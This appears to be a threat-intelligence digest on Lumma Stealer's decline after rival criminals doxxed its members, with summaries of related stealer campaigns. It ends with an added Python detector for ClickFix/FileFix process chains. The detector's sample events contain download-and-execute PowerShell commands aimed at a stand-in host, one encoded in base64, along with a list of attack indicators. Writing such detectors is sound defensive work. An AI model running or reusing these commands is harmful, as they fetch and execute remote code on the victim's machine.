Lumma Stealer Activity Declines Following Doxxing of Core Members
Summary
Lumma Stealer, a prominent information stealer, has seen a sharp drop in activity since August 2025. The decline follows the doxxing of five alleged core members, including the malware's administrator and developer, which exposed personal and operational details such as passport numbers, bank account details, and social media profiles. The campaign, attributed by Trend Micro to rival cybercriminals, coincided with a marked decrease in command-and-control (C&C) infrastructure activity and disrupted the group's communications; its Telegram accounts were compromised on September 17, 2025, cutting off effective contact with customers. Customers have started moving to alternative stealers such as Vidar and StealC, and the disruption has also hit the pay-per-install (PPI) service Amadey, which was used to distribute Lumma Stealer. The consistency and depth of the leaked material suggest insider knowledge or access to compromised accounts and databases.
Timeline
- 20.10.2025 15:42 · 2 articles
Doxxing Campaign Leads to Decline in Lumma Stealer Activity
The doxxing campaign was carried out by cybercrime competitors, according to a Trend Micro report. The campaign targeted individuals responsible for operational oversight and technical roles associated with crypter development for malware obfuscation. The doxxing campaign included threats, accusations of betrayal within the cybercriminal community, and claims that the Lumma Stealer team had prioritized profit over operational security. The campaign's consistency and depth suggest insider knowledge or access to compromised accounts and databases. The doxxing campaign took place between August and October 2025. The Telegram accounts were compromised on September 17, 2025, further disrupting the group's ability to communicate with customers and coordinate operations.
Sources:
- Lumma Stealer Activity Drops After Doxxing — www.securityweek.com — 20.10.2025 15:42
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
Information Snippets
- Lumma Stealer, also known as LummaC2 Stealer or LummaC2, has been active since at least August 2022.
First reported: 20.10.2025 15:42 · 2 sources, 2 articles
Sources:
- Lumma Stealer Activity Drops After Doxxing — www.securityweek.com — 20.10.2025 15:42
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
- The malware was targeted by a law enforcement operation in May 2025 but resumed activity two months later on rebuilt infrastructure.
First reported: 20.10.2025 15:42 · 1 source, 1 article
Sources:
- Lumma Stealer Activity Drops After Doxxing — www.securityweek.com — 20.10.2025 15:42
- The doxxing campaign exposed personal and operational details of five alleged core members, including the malware's administrator and developer.
First reported: 20.10.2025 15:42 · 2 sources, 2 articles
Sources:
- Lumma Stealer Activity Drops After Doxxing — www.securityweek.com — 20.10.2025 15:42
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
- The doxxing campaign included sensitive information such as passport numbers, bank account details, and social media profiles.
First reported: 20.10.2025 15:42 · 2 sources, 2 articles
Sources:
- Lumma Stealer Activity Drops After Doxxing — www.securityweek.com — 20.10.2025 15:42
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
- The group's Telegram accounts were compromised, disrupting communications with customers and contributing to the decline in activity.
First reported: 20.10.2025 15:42 · 2 sources, 2 articles
Sources:
- Lumma Stealer Activity Drops After Doxxing — www.securityweek.com — 20.10.2025 15:42
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
- Cybercriminals are transitioning to alternative information stealers such as Vidar and StealC.
First reported: 20.10.2025 15:42 · 2 sources, 2 articles
Sources:
- Lumma Stealer Activity Drops After Doxxing — www.securityweek.com — 20.10.2025 15:42
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
- The disruption has also affected the pay-per-install (PPI) service Amadey, which was used for Lumma Stealer distribution.
First reported: 20.10.2025 15:42 · 2 sources, 2 articles
Sources:
- Lumma Stealer Activity Drops After Doxxing — www.securityweek.com — 20.10.2025 15:42
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
- The decline in Lumma Stealer activity may encourage new, stealthier infostealer variants to enter the market.
First reported: 20.10.2025 15:42 · 1 source, 1 article
Sources:
- Lumma Stealer Activity Drops After Doxxing — www.securityweek.com — 20.10.2025 15:42
- The doxxing campaign was carried out by cybercrime competitors, according to a Trend Micro report.
First reported: 21.10.2025 11:00 · 1 source, 1 article
Sources:
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
- The doxxing campaign targeted individuals responsible for operational oversight and technical roles associated with crypter development for malware obfuscation.
First reported: 21.10.2025 11:00 · 1 source, 1 article
Sources:
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
- The doxxing campaign included threats, accusations of betrayal within the cybercriminal community, and claims that the Lumma Stealer team had prioritized profit over operational security.
First reported: 21.10.2025 11:00 · 1 source, 1 article
Sources:
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
- The doxxing campaign's consistency and depth suggest insider knowledge or access to compromised accounts and databases.
First reported: 21.10.2025 11:00 · 1 source, 1 article
Sources:
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
- The doxxing campaign took place between August and October 2025.
First reported: 21.10.2025 11:00 · 1 source, 1 article
Sources:
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
- The Telegram accounts were compromised on September 17, 2025, further disrupting the group's ability to communicate with customers and coordinate operations.
First reported: 21.10.2025 11:00 · 1 source, 1 article
Sources:
- Lumma Stealer Developers Doxxed in Underground Rival Cybercrime Campaign — www.infosecurity-magazine.com — 21.10.2025 11:00
Similar Happenings
Insight Partners Ransomware Breach Affects 12,657 Individuals
Insight Partners, a New York-based venture capital and private equity firm, has notified 12,657 individuals that their personal information was compromised in a ransomware attack. The breach, which occurred in October 2024, involved a sophisticated social engineering attack that allowed threat actors to access and encrypt servers. The stolen data includes banking and tax information, personal details of current and former employees, and information related to limited partners, funds, and portfolio companies. The company has offered complimentary credit or identity monitoring services to those affected and has filed breach notifications with state attorneys general. The incident highlights the ongoing risk of social engineering attacks and the potential for significant data exfiltration in ransomware breaches.
Malicious Browser Extensions Target Meta Business Accounts
Cybersecurity researchers have identified two campaigns using fake browser extensions to hijack Meta Business accounts. The extensions, disguised as legitimate tools for Facebook and Instagram verification and ad optimization, steal session cookies and credentials. The attackers target Meta advertisers to sell hijacked accounts on underground forums or repurpose them for further malicious activities. The campaigns are linked to Vietnamese-speaking threat actors and exploit legitimate cloud services and the Chrome Web Store. The first campaign involves fake 'Meta Verified' extensions named SocialMetrics Pro, distributed via malicious ads and fake websites. The second campaign uses rogue Chrome extensions disguised as AI-powered ad optimization tools, including Madgicx Plus and Meta Ads SuperTool. Both campaigns aim to steal sensitive data and compromise Meta Business accounts.
UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages
The FileFix social engineering attack, a variant of the ClickFix family, impersonates Meta account suspension warnings to trick users into installing the StealC infostealer. The campaign evolved over two weeks with different payloads, domains, and lures, indicating an attacker testing and adapting its infrastructure. The FileFix technique, created by red team researcher mr.d0x, uses the File Explorer address bar to execute malicious commands; a multilingual phishing site walks the victim through pasting the command there. Because the payload is executed by the victim's web browser, the FileFix chain is more likely to be detected by security products than a classic ClickFix chain. The malicious components are hosted on Bitbucket, abusing a legitimate source code hosting platform to evade detection. A multi-stage PowerShell script downloads a JPG image (believed to be AI-generated) that hides a second-stage PowerShell script and encrypted executables via steganography, decodes the image into the next-stage payload, and runs a Go-based loader to launch StealC. Junk code and fragmentation obfuscate the stages to hinder analysis. StealC targets credentials from various applications, cryptocurrency wallets, and cloud services, and can take screenshots of the active desktop. The campaign demonstrates significant investment in tradecraft, with carefully engineered phishing infrastructure, payload delivery, and supporting elements built to maximize evasion and impact.
A related MetaStealer attack, also a ClickFix variant, uses a fake Cloudflare Turnstile lure and an MSI package disguised as a PDF to deploy the MetaStealer infostealer. Its multi-stage infection chain includes DLL sideloading via a legitimate SentinelOne executable, and it targets crypto wallets and other sensitive information through a combination of social engineering and technical evasion.
Previously, threat actors tracked as UNC5518 leveraged the ClickFix tactic to deploy the CORNFLAKE.V3 backdoor. The campaign used fake CAPTCHA pages to trick users into executing malicious PowerShell scripts, providing initial access to systems. This access was then monetized by other threat groups, including UNC5774 and UNC4108, which deployed additional payloads. The attack began with users interacting with compromised search results or malicious ads that led to fake CAPTCHA pages, where they were tricked into running a malicious PowerShell command that downloaded and executed CORNFLAKE.V3. The backdoor supported various payload types and could collect system information, which was transmitted via Cloudflare tunnels to evade detection. CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, adding host persistence and additional payload support. The campaign also deployed WINDYTWIST.SEA, a backdoor that supports lateral movement within infected networks.
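The FileFix and ClickFix chains described above share an observable a defender can key on: a user-facing shell (PowerShell, cmd, mshta) spawned either from the browser process (FileFix, where the File Explorer dialog is hosted by the browser) or from explorer.exe (ClickFix, via the Run dialog) with a download-and-execute command line. The following Python detector is an added example, not code from any of the cited reports; it runs over constructed Sysmon-style process-creation events, and the process-name sets, indicator strings, hit threshold and sample command lines are assumptions chosen for illustration rather than any vendor's rule.

```python
"""Heuristic detection of ClickFix / FileFix style process chains.

Added example. Input is a list of Sysmon-like process-creation events
(Image, ParentImage, CommandLine). The sample events below are constructed
for this example; the indicator list and thresholds are assumptions.
"""
import base64
import re
from dataclasses import dataclass

# Assumed process-name sets (lowercase basenames).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

# Substrings that recur in ClickFix/FileFix one-liners: in-memory execution,
# download cradles, decode-and-run, hidden window. Assumed, not a vendor rule.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
              "frombase64string", "-enc", "-w hidden", "-windowstyle hidden",
              "bypass", "http")


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_powershell(script: str) -> str:
    """Build a PowerShell -EncodedCommand argument (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmd: str) -> str:
    """Return the decoded -e/-enc/-EncodedCommand payload, or '' if none/invalid."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", cmd, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(ev: ProcEvent):
    """Return (label, hits): label is 'filefix', 'clickfix' or None."""
    child, parent = _basename(ev.image), _basename(ev.parent_image)
    if child not in SHELLS:
        return None, []
    # Inspect both the raw command line and any decoded -EncodedCommand body.
    text = (ev.command_line + " " + decode_encoded_command(ev.command_line)).lower()
    hits = [i for i in INDICATORS if i in text]
    if parent in BROWSERS:
        # FileFix: the File Explorer dialog runs inside the browser process,
        # so the shell's parent is the browser. Rare enough to flag on its own.
        return "filefix", hits
    if parent == "explorer.exe" and len(hits) >= 2:
        # ClickFix: Run dialog (explorer.exe parent) is common for admins, so
        # require at least two indicators (assumed threshold) before flagging.
        return "clickfix", hits
    return None, hits


def detect_all(events):
    """Return [(index, label, hits)] for every flagged event."""
    out = []
    for i, ev in enumerate(events):
        label, hits = classify(ev)
        if label:
            out.append((i, label, hits))
    return out


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (not taken from any report); example.invalid is a reserved TLD.
SAMPLE_EVENTS = [
    ProcEvent(PS, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              'powershell -w hidden -c "iex (iwr http://example.invalid/img.jpg -UseBasicParsing)"'),
    ProcEvent(PS, r"C:\Windows\explorer.exe",
              "powershell -enc " + encode_powershell(
                  'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")')),
    ProcEvent(PS, r"C:\Windows\explorer.exe",
              r"powershell -NoProfile -File C:\scripts\backup.ps1"),   # benign admin use
    ProcEvent(r"C:\Windows\System32\notepad.exe",
              r"C:\Program Files\Google\Chrome\Application\chrome.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for idx, label, hits in detect_all(SAMPLE_EVENTS):
        print(f"event {idx}: {label} hits={hits}")
```

The parent-process split matters in practice: a browser spawning PowerShell is unusual enough to alert on alone, whereas explorer.exe spawning PowerShell is routine for administrators, so the example demands corroborating command-line indicators there. Decoding `-EncodedCommand` before matching is what lets the second sample, whose raw command line is nothing but base64, still match on `DownloadString` and `IEX`.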